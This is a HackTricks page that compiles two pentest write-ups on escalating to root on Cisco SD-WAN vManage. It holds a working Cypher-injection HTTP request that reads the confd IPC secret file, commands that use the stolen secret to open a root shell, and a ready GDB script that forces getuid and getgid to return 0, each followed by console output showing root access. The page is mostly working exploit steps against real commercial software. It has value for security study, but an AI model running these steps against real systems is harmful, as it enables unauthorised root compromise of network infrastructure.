mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-22 19:13:39 +00:00
196 lines
8.8 KiB
Markdown
196 lines
8.8 KiB
Markdown
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
|
||
# Path 1
|
||
|
||
(Example from [https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html](https://www.synacktiv.com/en/publications/pentesting-cisco-sd-wan-part-1-attacking-vmanage.html))
|
||
|
||
After digging a little through some [documentation](http://66.218.245.39/doc/html/rn03re18.html) related to `confd` and the different binaries (accessible with an account on the Cisco website), we found that to authenticate the IPC socket, it uses a secret located in `/etc/confd/confd_ipc_secret`:
|
||
|
||
```
|
||
|
||
vmanage:~$ ls -al /etc/confd/confd_ipc_secret
|
||
|
||
-rw-r----- 1 vmanage vmanage 42 Mar 12 15:47 /etc/confd/confd_ipc_secret
|
||
```
|
||
|
||
Remember our Neo4j instance? It is running under the `vmanage` user's privileges, thus allowing us to retrieve the file using the previous vulnerability:
|
||
|
||
```
|
||
|
||
GET /dataservice/group/devices?groupId=test\\\'<>\"test\\\\\")+RETURN+n+UNION+LOAD+CSV+FROM+\"file:///etc/confd/confd_ipc_secret\"+AS+n+RETURN+n+//+' HTTP/1.1
|
||
|
||
Host: vmanage-XXXXXX.viptela.net
|
||
|
||
|
||
|
||
[...]
|
||
|
||
"data":[{"n":["3708798204-3215954596-439621029-1529380576"]}]}
|
||
```
|
||
|
||
The `confd_cli` program does not support command line arguments but calls `/usr/bin/confd_cli_user` with arguments. So, we could directly call `/usr/bin/confd_cli_user` with our own set of arguments. However it's not readable with our current privileges, so we have to retrieve it from the rootfs and copy it using scp, read the help, and use it to get the shell:
|
||
|
||
```
|
||
|
||
vManage:~$ echo -n "3708798204-3215954596-439621029-1529380576" > /tmp/ipc_secret
|
||
|
||
vManage:~$ export CONFD_IPC_ACCESS_FILE=/tmp/ipc_secret
|
||
|
||
vManage:~$ /tmp/confd_cli_user -U 0 -G 0
|
||
|
||
Welcome to Viptela CLI
|
||
|
||
admin connected from 127.0.0.1 using console on vManage
|
||
|
||
vManage# vshell
|
||
|
||
vManage:~# id
|
||
|
||
uid=0(root) gid=0(root) groups=0(root)
|
||
```
|
||
|
||
# Path 2
|
||
|
||
(Example from [https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77](https://medium.com/walmartglobaltech/hacking-cisco-sd-wan-vmanage-19-2-2-from-csrf-to-remote-code-execution-5f73e2913e77))
|
||
|
||
The blog¹ by the synacktiv team described an elegant way to get a root shell, but the caveat is it requires getting a copy of the `/usr/bin/confd_cli_user` which is only readable by root. I found another way to escalate to root without such hassle.
|
||
|
||
When I disassembled `/usr/bin/confd_cli` binary, I observed the following:
|
||
|
||
```
|
||
vmanage:~$ objdump -d /usr/bin/confd_cli
|
||
… snipped …
|
||
40165c: 48 89 c3 mov %rax,%rbx
|
||
40165f: bf 1c 31 40 00 mov $0x40311c,%edi
|
||
401664: e8 17 f8 ff ff callq 400e80 <getenv@plt>
|
||
401669: 49 89 c4 mov %rax,%r12
|
||
40166c: 48 85 db test %rbx,%rbx
|
||
40166f: b8 dc 30 40 00 mov $0x4030dc,%eax
|
||
401674: 48 0f 44 d8 cmove %rax,%rbx
|
||
401678: 4d 85 e4 test %r12,%r12
|
||
40167b: b8 e6 30 40 00 mov $0x4030e6,%eax
|
||
401680: 4c 0f 44 e0 cmove %rax,%r12
|
||
401684: e8 b7 f8 ff ff callq 400f40 <getuid@plt> <-- HERE
|
||
401689: 89 85 50 e8 ff ff mov %eax,-0x17b0(%rbp)
|
||
40168f: e8 6c f9 ff ff callq 401000 <getgid@plt> <-- HERE
|
||
401694: 89 85 44 e8 ff ff mov %eax,-0x17bc(%rbp)
|
||
40169a: 8b bd 68 e8 ff ff mov -0x1798(%rbp),%edi
|
||
4016a0: e8 7b f9 ff ff callq 401020 <ttyname@plt>
|
||
4016a5: c6 85 cf f7 ff ff 00 movb $0x0,-0x831(%rbp)
|
||
4016ac: 48 85 c0 test %rax,%rax
|
||
4016af: 0f 84 ad 03 00 00 je 401a62 <socket@plt+0x952>
|
||
4016b5: ba ff 03 00 00 mov $0x3ff,%edx
|
||
4016ba: 48 89 c6 mov %rax,%rsi
|
||
4016bd: 48 8d bd d0 f3 ff ff lea -0xc30(%rbp),%rdi
|
||
4016c4: e8 d7 f7 ff ff callq 400ea0 <*ABS*+0x32e9880f0b@plt>
|
||
… snipped …
|
||
```
|
||
|
||
When I run “ps aux”, I observed the following (_note -g 100 -u 107_)
|
||
|
||
```
|
||
vmanage:~$ ps aux
|
||
… snipped …
|
||
root 28644 0.0 0.0 8364 652 ? Ss 18:06 0:00 /usr/lib/confd/lib/core/confd/priv/cmdptywrapper -I 127.0.0.1 -p 4565 -i 1015 -H /home/neteng -N neteng -m 2232 -t xterm-256color -U 1358 -w 190 -h 43 -c /home/neteng -g 100 -u 1007 bash
|
||
… snipped …
|
||
```
|
||
|
||
I hypothesized the “confd_cli” program passes the user ID and group ID it collected from the logged in user to the “cmdptywrapper” application.
|
||
|
||
My first attempt was to run the “cmdptywrapper” directly and supplying it with `-g 0 -u 0`, but it failed. It appears a file descriptor (-i 1015) was created somewhere along the way and I cannot fake it.
|
||
|
||
As mentioned in synacktiv’s blog(last example), the `confd_cli` program does not support command line argument, but I can influence it with a debugger and fortunately GDB is included on the system.
|
||
|
||
I created a GDB script where I forced the API `getuid `and `getgid` to return 0. Since I already have “vmanage” privilege through the deserialization RCE, I have permission to read the `/etc/confd/confd_ipc_secret` directly.
|
||
|
||
root.gdb:
|
||
|
||
```
|
||
set environment USER=root
|
||
define root
|
||
finish
|
||
set $rax=0
|
||
continue
|
||
end
|
||
break getuid
|
||
commands
|
||
root
|
||
end
|
||
break getgid
|
||
commands
|
||
root
|
||
end
|
||
run
|
||
```
|
||
|
||
Console Output:
|
||
|
||
```
|
||
vmanage:/tmp$ gdb -x root.gdb /usr/bin/confd_cli
|
||
GNU gdb (GDB) 8.0.1
|
||
Copyright (C) 2017 Free Software Foundation, Inc.
|
||
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
|
||
This is free software: you are free to change and redistribute it.
|
||
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
|
||
and "show warranty" for details.
|
||
This GDB was configured as "x86_64-poky-linux".
|
||
Type "show configuration" for configuration details.
|
||
For bug reporting instructions, please see:
|
||
<http://www.gnu.org/software/gdb/bugs/>.
|
||
Find the GDB manual and other documentation resources online at:
|
||
<http://www.gnu.org/software/gdb/documentation/>.
|
||
For help, type "help".
|
||
Type "apropos word" to search for commands related to "word"...
|
||
Reading symbols from /usr/bin/confd_cli...(no debugging symbols found)...done.
|
||
Breakpoint 1 at 0x400f40
|
||
Breakpoint 2 at 0x401000Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
|
||
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
||
0x0000000000401689 in ?? ()Breakpoint 2, getgid () at ../sysdeps/unix/syscall-template.S:59
|
||
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
||
0x0000000000401694 in ?? ()Breakpoint 1, getuid () at ../sysdeps/unix/syscall-template.S:59
|
||
59 T_PSEUDO_NOERRNO (SYSCALL_SYMBOL, SYSCALL_NAME, SYSCALL_NARGS)
|
||
0x0000000000401871 in ?? ()
|
||
Welcome to Viptela CLI
|
||
root connected from 127.0.0.1 using console on vmanage
|
||
vmanage# vshell
|
||
bash-4.4# whoami ; id
|
||
root
|
||
uid=0(root) gid=0(root) groups=0(root)
|
||
bash-4.4#
|
||
```
|
||
|
||
|
||
<details>
|
||
|
||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
|
||
|